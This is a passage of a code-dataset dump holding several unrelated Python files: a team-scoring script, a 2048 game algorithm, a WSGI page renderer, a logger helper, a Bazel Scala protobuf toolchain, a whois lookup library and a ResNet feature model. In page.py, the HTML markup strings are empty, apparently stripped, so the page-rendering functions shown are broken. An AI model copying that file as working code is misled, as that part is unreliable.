If it's a repeat of\n# the highest score, tick up the bestteams counter by one.\nfor i in range(n):\n    for j in range(i + 1, n):\n        mix = str(bin(skills[i] | skills[j])).count('1')\n        if mix > bestscore:\n            bestscore = mix\n            bestteams = 1\n        elif mix == bestscore:\n            bestteams += 1\n\n# Print results\nprint(bestscore)\nprint(bestteams)","sub_path":"python/ACM_ICPC_teams.py","file_name":"ACM_ICPC_teams.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229865291","text":"\"\"\"\n    2048 game core algorithm\n    On architecture:\n        separate the display (UI) from the control (algorithm)\n        console\n        PyQt\n        PyGame\n\n    On the algorithm:\n        1. High cohesion:\n            up/down moves -matrix transpose-> left/right moves\n            move left  --> merge data --> shift zeros to the end\n            move right -reverse-> merge data --> shift zeros to the end\n        2. Dimensionality reduction:\n            turn operations on the 2D list into operations on a 1D list.\n\"\"\"\nlist_merge = [2, 0, 0, 2]\n\n\n# 1. Define zero_to_end()\n# [2,0,2,0] --> [2,2,0,0]\n# [2,0,0,2] --> [2,2,0,0]\n# [2,4,0,2] --> [2,4,2,0]\ndef zero_to_end():\n    \"\"\"\n    Move zero elements to the end.\n    Idea: scan from back to front; when a 0 is found, delete it and append a 0 at the end.\n    \"\"\"\n    for i in range(len(list_merge) - 1, -1, -1):\n        if list_merge[i] == 0:\n            del list_merge[i]\n            list_merge.append(0)\n\n\n# zero_to_end()\n# print(list_merge)\n\n\n# 2. Define merge()\n# [2,0,2,0] -->[2,2,0,0] --> [4,0,0,0]\n# [2,0,0,2] -->[2,2,0,0] --> [4,0,0,0]\n# [4,4,4,4] --> [8,8,0,0]\n# [2,0,4,2] --> [2,4,2,0]\ndef merge():\n    \"\"\"\n    Merge data.\n    Core idea: shift zeros to the end, then merge adjacent equal neighbours.\n    \"\"\"\n    zero_to_end()\n    for i in range(len(list_merge) - 1):\n        if list_merge[i] == list_merge[i + 1]:\n            list_merge[i] += list_merge[i + 1]\n            del list_merge[i + 1]\n            list_merge.append(0)\n            # scoring would go here\n\n\n# merge()\n# print(list_merge)\n\n# 3. Move left\nmap = [\n    [2, 0, 0, 2],\n    [4, 2, 0, 2],\n    [2, 4, 2, 4],\n    [0, 4, 0, 4],\n]\n\n\ndef move_left():\n    \"\"\"\n    Move map to the left.\n    Idea: hand each row to list_merge, then ask merge() to combine it.\n    :return:\n    \"\"\"\n    global list_merge\n    for line in map:\n        list_merge = line\n        merge()\n\n\n# move_left()\n# print(map)\n\n# 4. Move right: move_right\ndef move_right():\n    \"\"\"\n    Move map to the right.\n    Idea: hand each reversed row to list_merge, then ask merge() to combine it.\n    :return:\n    \"\"\"\n    global list_merge\n    for line in map:\n        # read the row right-to-left into a new list\n        list_merge = line[::-1]\n        # process the data\n        merge()\n        # write the processed data back right-to-left into map\n        line[::-1] = list_merge\n\n\n# move_right()\n# print(map)\n\n# 5. Move up: move_up = transpose -> move_left -> transpose\ndef square_matrix_transposition():\n    \"\"\"\n    Transpose a square matrix (turn columns into rows).\n    :param map: the square matrix to transpose\n    :return:\n    \"\"\"\n    for c in range(1, len(map)):  # 1 2 3\n        for r in range(c, len(map)):\n            map[r][c - 1], map[c - 1][r] = map[c - 1][r], map[r][c - 1]\n\n\ndef move_up():\n    \"\"\"\n    Move up.\n    Idea: transpose, move_left, transpose.\n    \"\"\"\n    square_matrix_transposition()\n    move_left()\n    square_matrix_transposition()\n\n\n# 6. 

向下移动\ndef move_down():\n \"\"\"\n 向下移动\n 思想: 转置 move_right 转置\n :return:\n \"\"\"\n square_matrix_transposition()\n move_right()\n square_matrix_transposition()\n\n\n# move_up()\nmove_down()\nprint(map)\n","sub_path":"month02/day13/FTP/game2048.py","file_name":"game2048.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161217743","text":"#!/usr/bin/env python3.9\nimport time\nimport html\nimport collections\nimport urllib.parse\nimport wsgiref.handlers\nimport common\nimport configuration\nimport indent\n\nTheme = collections.namedtuple('Theme', ['url', 'sri', 'navbar', 'navbar2', 'dark'])\n\n# https://bootswatch.com/3/\nthemes = {\n\t'cerulean': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/cerulean/bootstrap.min.css', 'sha384-zF4BRsG/fLiTGfR9QL82DrilZxrwgY/+du4p/c7J72zZj+FLYq4zY00RylP9ZjiT', '#54b4eb', '#04519b', False),\n\t'cosmo': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/cosmo/bootstrap.min.css', 'sha384-h21C2fcDk/eFsW9sC9h0dhokq5pDinLNklTKoxIZRUn3+hvmgQSffLLQ4G4l2eEr', '#222222', '#2780e3', False),\n\t'cyborg': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/cyborg/bootstrap.min.css', 'sha384-D9XILkoivXN+bcvB2kSOowkIvIcBbNdoDQvfBNsxYAIieZbx8/SI4NeUvrRGCpDi', '#060606', '#282828', True),\n\t'darkly': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/darkly/bootstrap.min.css', 'sha384-S7YMK1xjUjSpEnF4P8hPUcgjXYLZKK3fQW1j5ObLSl787II9p8RO9XUGehRmKsxd', '#375a7f', '#00bc8c', True),\n\t'flatly': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/flatly/bootstrap.min.css', 'sha384-+ENW/yibaokMnme+vBLnHMphUYxHs34h9lpdbSLuAwGkOKFRl4C34WkjazBtb7eT', '#2c3e50', '#18bc9c', False),\n\t'journal': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/journal/bootstrap.min.css', 'sha384-1L94saFXWAvEw88RkpRz8r28eQMvt7kG9ux3DdCqya/P3CfLNtgqzMnyaUa49Pl2', '#ffffff', '#eb6864', False),\n\t'lumen': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/lumen/bootstrap.min.css', 'sha384-gv0oNvwnqzF6ULI9TVsSmnULNb3zasNysvWwfT/s4l8k5I+g6oFz9dye0wg3rQ2Q', '#f8f8f8', '#ffffff', False),\n\t'paper': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/paper/bootstrap.min.css', 'sha384-awusxf8AUojygHf2+joICySzB780jVvQaVCAt1clU3QsyAitLGul28Qxb2r1e5g+', '#ffffff', '#2196f3', False),\n\t'readable': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/readable/bootstrap.min.css', 'sha384-Li5uVfY2bSkD3WQyiHX8tJd0aMF91rMrQP5aAewFkHkVSTT2TmD2PehZeMmm7aiL', '#ffffff', '#ffffff', False),\n\t'sandstone': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/sandstone/bootstrap.min.css', 'sha384-G3G7OsJCbOk1USkOY4RfeX1z27YaWrZ1YuaQ5tbuawed9IoreRDpWpTkZLXQfPm3', '#3e3f3a', '#93c54b', False),\n\t'simplex': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/simplex/bootstrap.min.css', 'sha384-C0X5qw1DlkeV0RDunhmi4cUBUkPDTvUqzElcNWm1NI2T4k8tKMZ+wRPQOhZfSJ9N', '#ffffff', '#d9230f', False),\n\t'slate': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/slate/bootstrap.min.css', 'sha384-RpX8okQqCyUNG7PlOYNybyJXYTtGQH+7rIKiVvg1DLg6jahLEk47VvpUyS+E2/uJ', '#484e55', '#8a9196', True),\n\t'spacelab': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/spacelab/bootstrap.min.css', 'sha384-L/tgI3wSsbb3f/nW9V6Yqlaw3Gj7mpE56LWrhew/c8MIhAYWZ/FNirA64AVkB5pI', '#ffffff', '#6d94bf', False),\n\t'superhero': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/superhero/bootstrap.min.css', 'sha384-Xqcy5ttufkC3rBa8EdiAyA1VgOGrmel2Y+wxm4K3kI3fcjTWlDWrlnxyD6hOi3PF', '#4e5d6c', 
'#df691a', True),\n\t'united': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/united/bootstrap.min.css', 'sha384-pVJelSCJ58Og1XDc2E95RVYHZDPb9AVyXsI8NoVpB2xmtxoZKJePbMfE4mlXw7BJ', '#e95420', '#772953', False),\n\t'yeti': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/yeti/bootstrap.min.css', 'sha384-HzUaiJdCTIY/RL2vDPRGdEQHHahjzwoJJzGUkYjHVzTwXFQ2QN/nVgX7tzoMW3Ov', '#333333', '#008cba', False)\n}\n\ndef HtmlIndenter(stream):\n\treturn indent.Indenter(stream, html.escape)\n\ndef uri_to_url(environ, uri):\n\tassert(uri[0] == '/')\n\n\tscheme = environ['wsgi.url_scheme']\n\thost = environ['HTTP_HOST']\n\n\treturn '{0}://{1}{2}'.format(scheme, host, uri)\n\ndef match_in_qs(environ, values, fallback):\n\tresult = None\n\n\tfor key, value in urllib.parse.parse_qsl(environ['QUERY_STRING'], keep_blank_values=True):\n\t\tif key == '' or value != '':\n\t\t\tcontinue\n\t\tif not key in values:\n\t\t\tcontinue\n\n\t\tif result is None:\n\t\t\tresult = key\n\t\telif result != key:\n\t\t\treturn fallback\n\n\tif result is None:\n\t\tresult = ''\n\n\treturn values[result]\n\ndef make_content_disposition_header(filename, extension='', inline=True):\n\tfilename = filename + extension\n\tdisposition = 'inline' if inline else 'attachment'\n\ttry:\n\t\tattachment = 'filename={0}'.format(urllib.parse.quote(filename, encoding='ascii'))\n\texcept UnicodeEncodeError:\n\t\tattachment = 'filename*=UTF-8\\'\\'{0}'.format(urllib.parse.quote(filename, encoding='utf-8', errors='ignore'))\n\treturn ('Content-Disposition', '{0}; {1}'.format(disposition, attachment))\n\ndef make_nocache_header():\n\treturn ('Cache-Control', 'no-cache, no-store, must-revalidate')\n\ndef make_expires_header(expires):\n\treturn ('Expires', wsgiref.handlers.format_date_time(expires))\n\ndef make_tag(tag, attributes):\n\tformat = [tag]\n\tvalues = []\n\n\tfor attribute in attributes:\n\t\tif attribute[1] == '':\n\t\t\tcontinue\n\n\t\tformat.append('{0}=\"{{}}\"'.format(attribute[0]))\n\t\tvalues.append(attribute[1])\n\n\tformat = '<{0}>'.format(' '.join(format))\n\treturn [format] + values\n\ndef pretty_time(value):\n\treturn time.strftime(configuration.time_format, time.localtime(value))\n\ndef pretty_size(value):\n\tif value < 1024:\n\t\treturn '%uB' % value\n\telif value < 1048576:\n\t\treturn '%uK' % (value / 1024)\n\telif value < 8589934592:\n\t\treturn '%.1fM' % (value / 1048576.0)\n\telif value < 1099511627776:\n\t\treturn '%.2fG' % (value / 1073741824.0)\n\telse:\n\t\treturn '%.2fT' % (value / 1099511627776.0)\n\ndef render_page(environ, writer, code=200, headers=[], title=configuration.name, link_cb=None, navbar_cb=None, content_cb=None, script_cb=None):\n\ttheme = themes[configuration.theme]\n\th = HtmlIndenter(writer)\n\th.line('')\n\th.begin('')\n\th.begin('')\n\th.line('')\n\th.line('', theme.navbar2 if configuration.theme_inverse_navbar else theme.navbar)\n\th.line('{0}', title)\n\th.line('', theme.url, theme.sri)\n\tif link_cb:\n\t\tlink_cb(h)\n\th.end('')\n\th.begin('')\n\th.begin('')\n\th.begin('
')\n\tif content_cb:\n\t\tcontent_cb(h)\n\th.end('
')\n\th.line('')\n\th.line('')\n\tif script_cb:\n\t\tscript_cb(h)\n\th.end('')\n\th.end('')\n\n\treturn (code, [('Content-Type', 'text/html; charset=utf-8')] + headers)\n\ndef render_error_page(environ, writer, code, message):\n\th = HtmlIndenter(writer)\n\th.line('')\n\th.begin('')\n\th.begin('')\n\th.line('')\n\th.line('')\n\th.end('')\n\th.line('{0}', message)\n\th.end('')\n\n\treturn (code, [('Content-Type', 'text/html; charset=utf-8')])\n","sub_path":"page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"333487815","text":"\"\"\"\n\n\"\"\"\n\nimport logging\n\nlogging.basicConfig(\n format='%(asctime)-15s [%(threadName)s] %(levelname)s %(name)s - %(message)s')\n\n_logger_methods = {\n 'debug': 'd',\n 'info': 'i',\n 'warn': 'w',\n 'error': 'e',\n 'exception': 'ex'\n}\n\n\ndef getlogger(name, level=logging.WARN):\n \"\"\"\n\n :param name:\n :param level:\n :return:\n \"\"\"\n _logger = logging.getLogger(name)\n _logger.setLevel(level)\n for item in _logger_methods.items():\n try:\n m = getattr(_logger, item[0])\n if m and not hasattr(_logger, item[1]):\n setattr(_logger, item[1], m)\n except AttributeError:\n pass\n\n return _logger\n","sub_path":"proxywall/loggers.py","file_name":"loggers.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410170153","text":"load(\"@io_bazel_rules_scala//scala:providers.bzl\", \"DepsInfo\")\nload(\"//scala/private/toolchain_deps:toolchain_deps.bzl\", \"expose_toolchain_deps\")\n\ndef _scala_proto_toolchain_impl(ctx):\n toolchain = platform_common.ToolchainInfo(\n with_grpc = ctx.attr.with_grpc,\n with_flat_package = ctx.attr.with_flat_package,\n with_single_line_to_string = ctx.attr.with_single_line_to_string,\n blacklisted_protos = ctx.attr.blacklisted_protos,\n code_generator = ctx.attr.code_generator,\n main_generator = ctx.attr.main_generator,\n extra_generator_dependencies = ctx.attr.extra_generator_dependencies,\n scalac = ctx.attr.scalac.files_to_run,\n named_generators = ctx.attr.named_generators,\n )\n return [toolchain]\n\n# Args:\n# with_grpc: Enables generation of grpc service bindings for services\n# with_flat_package: When true, ScalaPB will not append the protofile base name to the package name\n# with_single_line_to_string: Enables generation of toString() methods that use the single line format\n# blacklisted_protos: list of protobuf targets to exclude from recursive building\n# code_generator: what code generator to use, usually you'll want the default\nscala_proto_toolchain = rule(\n _scala_proto_toolchain_impl,\n attrs = {\n \"with_grpc\": attr.bool(),\n \"with_flat_package\": attr.bool(),\n \"with_single_line_to_string\": attr.bool(),\n \"blacklisted_protos\": attr.label_list(default = []),\n \"code_generator\": attr.label(\n executable = True,\n cfg = \"exec\",\n default = Label(\"@io_bazel_rules_scala//src/scala/scripts:scalapb_worker\"),\n allow_files = True,\n ),\n \"main_generator\": attr.string(default = \"scalapb.ScalaPbCodeGenerator\"),\n \"named_generators\": attr.string_dict(),\n \"extra_generator_dependencies\": attr.label_list(\n providers = [JavaInfo],\n ),\n \"scalac\": attr.label(\n executable = True,\n cfg = \"exec\",\n default = Label(\"@io_bazel_rules_scala//src/java/io/bazel/rulesscala/scalac\"),\n allow_files = True,\n ),\n },\n)\n\ndef _scala_proto_deps_toolchain(ctx):\n toolchain = 
platform_common.ToolchainInfo(\n dep_providers = ctx.attr.dep_providers,\n )\n return [toolchain]\n\nscala_proto_deps_toolchain = rule(\n _scala_proto_deps_toolchain,\n attrs = {\n \"dep_providers\": attr.label_list(\n default = [\n \"@io_bazel_rules_scala//scala_proto:scalapb_compile_deps_provider\",\n \"@io_bazel_rules_scala//scala_proto:scalapb_grpc_deps_provider\",\n \"@io_bazel_rules_scala//scala_proto:scalapb_worker_deps_provider\",\n ],\n cfg = \"target\",\n providers = [DepsInfo],\n ),\n },\n)\n\ndef _export_scalapb_toolchain_deps(ctx):\n return expose_toolchain_deps(ctx, \"@io_bazel_rules_scala//scala_proto:deps_toolchain_type\")\n\nexport_scalapb_toolchain_deps = rule(\n _export_scalapb_toolchain_deps,\n attrs = {\n \"deps_id\": attr.string(\n mandatory = True,\n ),\n },\n incompatible_use_toolchain_transition = True,\n toolchains = [\"@io_bazel_rules_scala//scala_proto:deps_toolchain_type\"],\n)\n","sub_path":"scala_proto/scala_proto_toolchain.bzl","file_name":"scala_proto_toolchain.bzl","file_ext":"bzl","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525888364","text":"import sys\nfrom functools import wraps\nfrom typing import (\n Optional,\n List,\n Dict,\n Tuple,\n)\n\nfrom ._1_query import do_query\nfrom ._2_parse import (\n do_parse,\n NoneStrings,\n NoneStringsAdd,\n QuotaStrings,\n QuotaStringsAdd,\n)\n\nfrom ._3_adjust import Domain\nfrom ._0_init_tld import (\n ZZ,\n TLD_RE,\n validTlds,\n filterTldToSupportedPattern,\n mergeExternalDictWithRegex,\n)\n\nfrom .exceptions import (\n UnknownTld,\n FailedParsingWhoisOutput,\n UnknownDateFormat,\n WhoisCommandFailed,\n WhoisPrivateRegistry,\n WhoisQuotaExceeded,\n)\n\n\"\"\"\n Python module/library for retrieving WHOIS information of domains.\n\n By DDarko.org ddarko@ddarko.org http://ddarko.org/\n License MIT http://www.opensource.org/licenses/mit-license.php\n\n Usage example\n >>> import whois\n >>> domain = whois.query('google.com')\n >>> print(domain.__dict__) # print(whois.get('google.com'))\n\n {\n 'expiration_date': datetime.datetime(2020, 9, 14, 0, 0),\n 'last_updated': datetime.datetime(2011, 7, 20, 0, 0),\n 'registrar': 'MARKMONITOR INC.',\n 'name': 'google.com',\n 'creation_date': datetime.datetime(1997, 9, 15, 0, 0)\n }\n\n >>> print(domain.name)\n google.com\n\n >>> print(domain.expiration_date)\n 2020-09-14 00:00:00\n\n\"\"\"\n__all__ = [\n \"query\",\n \"get\",\n \"validTlds\",\n \"mergeExternalDictWithRegex\",\n \"NoneStrings\",\n \"NoneStringsAdd\",\n \"QuotaStrings\",\n \"QuotaStringsAdd\",\n]\n\n\nCACHE_FILE = None\nSLOW_DOWN = 0\n\n\ndef internationalizedDomainNameToPunyCode(d: List[str]) -> List[str]:\n return [k.encode(\"idna\").decode() or k for k in d]\n\n\ndef result2dict(func):\n @wraps(func)\n def _inner(*args, **kw):\n r = func(*args, **kw)\n return r and vars(r) or {}\n\n return _inner\n\n\ndef fromDomainStringToTld(\n domain: str,\n internationalized: bool,\n verbose: bool = False,\n):\n domain = domain.lower().strip().rstrip(\".\") # Remove the trailing dot to support FQDN.\n d: List[str] = domain.split(\".\")\n if verbose:\n print(d, file=sys.stderr)\n\n if d[0] == \"www\":\n d = d[1:]\n\n if len(d) == 1:\n return None, None\n\n tld: str = filterTldToSupportedPattern(domain, d, verbose)\n if verbose:\n print(f\"filterTldToSupportedPattern returns tld: {tld}\", file=sys.stderr)\n\n if internationalized and isinstance(internationalized, bool):\n d = internationalizedDomainNameToPunyCode(d)\n\n if verbose:\n 
print(tld, d, file=sys.stderr)\n\n return tld, d\n\n\ndef validateWeKnowTheToplevelDomain(tld, return_raw_text_for_unsupported_tld: bool = False): # may raise UnknownTld\n if tld not in TLD_RE.keys():\n if return_raw_text_for_unsupported_tld:\n return None\n a = f\"The TLD {tld} is currently not supported by this package.\"\n b = \"Use validTlds() to see what toplevel domains are supported.\"\n msg = f\"{a} {b}\"\n raise UnknownTld(msg)\n return TLD_RE.get(tld)\n\n\ndef verifyPrivateREgistry(thisTld: Dict): # may raise WhoisPrivateRegistry\n # signal we know the tld but it has no whos or does not respond with any information\n if thisTld.get(\"_privateRegistry\"):\n msg = \"This tld has either no whois server or responds only with minimal information\"\n raise WhoisPrivateRegistry(msg)\n\n\ndef doServerHintsForThisTld(tld: str, thisTld: Dict, server: Optional[str], verbose: bool = False):\n # allow server hints using \"_server\" from the tld_regexpr.py file\n thisTldServer = thisTld.get(\"_server\")\n if server is None and thisTldServer:\n server = thisTldServer\n if verbose:\n print(f\"using _server hint {server} for tld: {tld}\", file=sys.stderr)\n return server\n\n\ndef doSlowdownHintForThisTld(tld: str, thisTld, slow_down: int, verbose: bool = False) -> int:\n # allow a configrable slowdown for some tld's\n slowDown = thisTld.get(\"_slowdown\")\n if slow_down == 0 and slowDown and slowDown > 0:\n slow_down = slowDown\n if verbose:\n print(f\"using _slowdown hint {slowDown} for tld: {tld}\", file=sys.stderr)\n return slow_down\n\n\ndef doUnsupportedTldAnyway(\n tld: str,\n dl: List[str],\n ignore_returncode: bool = False,\n slow_down: int = 0,\n server: Optional[str] = None,\n verbose: bool = False,\n):\n include_raw_whois_text = True\n\n # we will not hunt for possible valid first level domains as we have no actual feedback\n\n whois_str = do_query(\n dl=dl,\n slow_down=slow_down,\n ignore_returncode=ignore_returncode,\n server=server,\n verbose=verbose,\n )\n\n # we will only return minimal data\n data = {\n \"tld\": tld,\n \"domain_name\": [],\n }\n data[\"domain_name\"] = [\".\".join(dl)] # note the fields are default all array, except tld\n\n if verbose:\n print(data, file=sys.stderr)\n\n return Domain(\n data=data,\n whois_str=whois_str,\n verbose=verbose,\n include_raw_whois_text=include_raw_whois_text,\n return_raw_text_for_unsupported_tld=True,\n )\n\n\nLastWhois: Dict = {\n \"Try\": [],\n}\n\n\ndef get_last_raw_whois_data():\n global LastWhois\n return LastWhois\n\n\ndef query(\n domain: str,\n force: bool = False,\n cache_file: Optional[str] = None,\n cache_age: int = 60 * 60 * 48,\n slow_down: int = 0,\n ignore_returncode: bool = False,\n server: Optional[str] = None,\n verbose: bool = False,\n with_cleanup_results=False,\n internationalized: bool = False,\n include_raw_whois_text: bool = False,\n return_raw_text_for_unsupported_tld: bool = False,\n timeout: float = None,\n) -> Optional[Domain]:\n \"\"\"\n force=True Don't use cache.\n cache_file= Use file to store cache not only memory.\n cache_age=172800 Cache expiration time for given domain, in seconds\n slow_down=0 Time [s] it will wait after you query WHOIS database.\n This is useful when there is a limit to the number of requests at a time.\n server: if set use the whois server explicitly for making the query:\n propagates on linux to \"whois -h \"\n propagates on Windows to whois.exe \n with_cleanup_results: cleanup lines starting with % and REDACTED FOR PRIVACY\n internationalized: if true convert with 
internationalizedDomainNameToPunyCode().\n ignore_returncode: if true and the whois command fails with code 1, still process the data returned as normal.\n verbose: if true, print relevant information on steps taken to standard error\n include_raw_whois_text:\n if reqested the full response is also returned.\n return_raw_text_for_unsupported_tld:\n if the tld is unsupported, just try it anyway but return only the raw text.\n timeout:\n timeout in seconds for the whois command to return a result.\n \"\"\"\n global LastWhois\n LastWhois[\"Try\"] = [] # init on start of query\n\n assert isinstance(domain, str), Exception(\"`domain` - must be \")\n return_raw_text_for_unsupported_tld = bool(return_raw_text_for_unsupported_tld)\n\n tld, dl = fromDomainStringToTld(domain, internationalized, verbose)\n if tld is None:\n return None\n\n thisTld = validateWeKnowTheToplevelDomain(tld, return_raw_text_for_unsupported_tld) # may raise UnknownTld\n if thisTld is None:\n return doUnsupportedTldAnyway(\n tld,\n dl,\n ignore_returncode=ignore_returncode,\n slow_down=slow_down,\n server=server,\n verbose=verbose,\n )\n\n verifyPrivateREgistry(thisTld) # may raise WhoisPrivateRegistry\n server = doServerHintsForThisTld(tld, thisTld, server, verbose)\n\n slow_down = slow_down or SLOW_DOWN\n slow_down = doSlowdownHintForThisTld(tld, thisTld, slow_down, verbose)\n\n # if the tld is a multi level we should not move further down than the tld itself\n # we currently allow progressive lookups until we find something:\n # so xxx.yyy.zzz will try both xxx.yyy.zzz and yyy.zzz\n # but if the tld is yyy.zzz we should only try xxx.yyy.zzz\n\n cache_file = cache_file or CACHE_FILE\n tldLevel = tld.split(\".\") # note while the top level domain may have a . the tld has a _ ( co.uk becomes co_uk )\n while 1:\n whois_str = do_query(\n dl=dl,\n force=force,\n cache_file=cache_file,\n cache_age=cache_age,\n slow_down=slow_down,\n ignore_returncode=ignore_returncode,\n server=server,\n verbose=verbose,\n timeout=timeout,\n )\n tryMe = {\n \"Domain\": \".\".join(dl),\n \"rawData\": whois_str,\n \"server\": server,\n }\n LastWhois[\"Try\"].append(tryMe)\n\n data = do_parse(\n whois_str=whois_str,\n tld=tld,\n dl=dl,\n verbose=verbose,\n with_cleanup_results=with_cleanup_results,\n )\n\n # do we have a result and does it have a domain name\n if data and data[\"domain_name\"][0]:\n return Domain(\n data=data,\n whois_str=whois_str,\n verbose=verbose,\n include_raw_whois_text=include_raw_whois_text,\n )\n\n if len(dl) > (len(tldLevel) + 1):\n dl = dl[1:] # strip one element from the front and try again\n if verbose:\n print(f\"try again with {dl}, {len(dl)}, {len(tldLevel) + 1}\", file=sys.stderr)\n continue\n\n # no result or no domain but we can not reduce any further so we have None\n return None\n\n return None\n\n\n# Add get function to support return result in dictionary form\nget = result2dict(query)\n","sub_path":"whois/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61221586","text":"# Copyright 2017-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n\n\nimport ResNetBasic\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import cosine_similarity\nimport math\n\n# Modification of ResNet so that it also outputs a feature vector\nclass 
ResNetFeat(ResNetBasic.ResNet):\n def __init__(self, block, list_of_num_layers, list_of_out_dims, num_classes=1000, only_trunk=False,\n classifier_has_bias=True, is_cosine=False, attr_layer_min=None, attr_layer_max=None):\n super(ResNetFeat, self).__init__(block, list_of_num_layers, list_of_out_dims, num_classes, only_trunk)\n self.pre_layer = nn.Linear(self.final_feat_dim, self.final_feat_dim)\n self.avg_pool = [nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1),\n nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1),\n nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1),\n nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1)]\n\n if is_cosine:\n self.classifier = Cosine(self.final_feat_dim, num_classes)\n else:\n self.classifier = nn.Linear(self.final_feat_dim, num_classes, bias=classifier_has_bias)\n\n self.intermediate_features = {}\n\n def hook_features(module, input, output):\n device_id = output.get_device()\n self.intermediate_features[device_id].append(output)\n\n transforms = []\n if attr_layer_min is not None:\n for i in range(attr_layer_min, attr_layer_max):\n if self.trunk[i].outdim != self.final_feat_dim:\n transforms.append(nn.Linear(self.trunk[i].outdim, self.final_feat_dim))\n else:\n transforms.append(nn.Sequential())\n self.trunk[i].register_forward_hook(hook_features)\n self.transforms = nn.Sequential(*transforms)\n\n def forward(self, x):\n device_id = x.get_device()\n self.intermediate_features[device_id] = []\n\n out = self.trunk(x)\n\n intermediate_features_pooled = []\n for i in range(len(self.intermediate_features[device_id])):\n temp = self.avg_pool[i](self.intermediate_features[device_id][i]).view(self.intermediate_features[device_id][i].size(0), -1)\n temp = self.transforms[i](temp)\n intermediate_features_pooled.append(temp)\n\n out = out.view(out.size(0), -1)\n # linear layer without relu for training cosine classifier\n out = self.pre_layer(out)\n\n intermediate_features_pooled.append(out)\n\n scores = self.classifier(out)\n\n return scores, intermediate_features_pooled\n\n def get_classifier_weight(self):\n return self.classifier.weight\n\n def get_classifier(self):\n return self.classifier\n\n\ndef ResNet10(num_classes=1000, only_trunk=False, classifier_has_bias=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.SimpleBlock, [1,1,1,1],[64,128,256,500], num_classes, only_trunk,\n classifier_has_bias=classifier_has_bias, is_cosine=is_cosine, attr_layer_min=7, attr_layer_max=7)\n\ndef ResNet18(num_classes=1000, only_trunk=False, classifier_has_bias=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.SimpleBlock, [2,2,2,2],[64,128,256,500],num_classes, only_trunk,\n classifier_has_bias=classifier_has_bias, is_cosine=is_cosine, attr_layer_min=9, attr_layer_max=11)\n\ndef ResNet34(num_classes=1000, only_trunk=False, classifier_has_bias=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.SimpleBlock, [3,4,6,3],[64,128,256,500], num_classes, only_trunk,\n classifier_has_bias=classifier_has_bias, is_cosine=is_cosine, attr_layer_min=9, attr_layer_max=19)\n\ndef ResNet50(num_classes=1000, only_trunk=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.BottleneckBlock, [3,4,6,3], [256,512,1024,2048], num_classes, only_trunk,\n classifier_has_bias=False, is_cosine=is_cosine)\n\ndef ResNet101(num_classes=1000, only_trunk=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.BottleneckBlock, [3,4,23,3],[256,512,1024,2048], num_classes, only_trunk,\n classifier_has_bias=False, 
is_cosine=is_cosine)\n\n\ndef get_model(model_name, num_classes, is_cosine=False):\n model_dict = dict(ResNet10 = ResNet10,\n ResNet18 = ResNet18,\n ResNet34 = ResNet34,\n ResNet50 = ResNet50,\n ResNet101 = ResNet101)\n return model_dict[model_name](num_classes, False, classifier_has_bias=False, is_cosine=is_cosine)\n\n\nclass Cosine(nn.Module):\n\n def __init__(self, in_features, out_features):\n super(Cosine, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.t = torch.ones(1).cuda() * 10\n self.weight = nn.Parameter(torch.Tensor(out_features, in_features))\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, input):\n batch_size = input.size(0)\n return self.t.cuda() * cosine_similarity(input.unsqueeze(1).expand(batch_size, self.out_features, self.in_features),\n self.weight.unsqueeze(0).expand(batch_size, self.out_features, self.in_features).cuda(), 2)\n\n def extra_repr(self):\n return 'in_features={}, out_features={}'.format(\n self.in_features, self.out_features\n )\n\n\n\n\n","sub_path":"ResNetFeat.py","file_name":"ResNetFeat.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133449078","text":"\nimport time\n\nfrom novaclient.v1_1 import client as 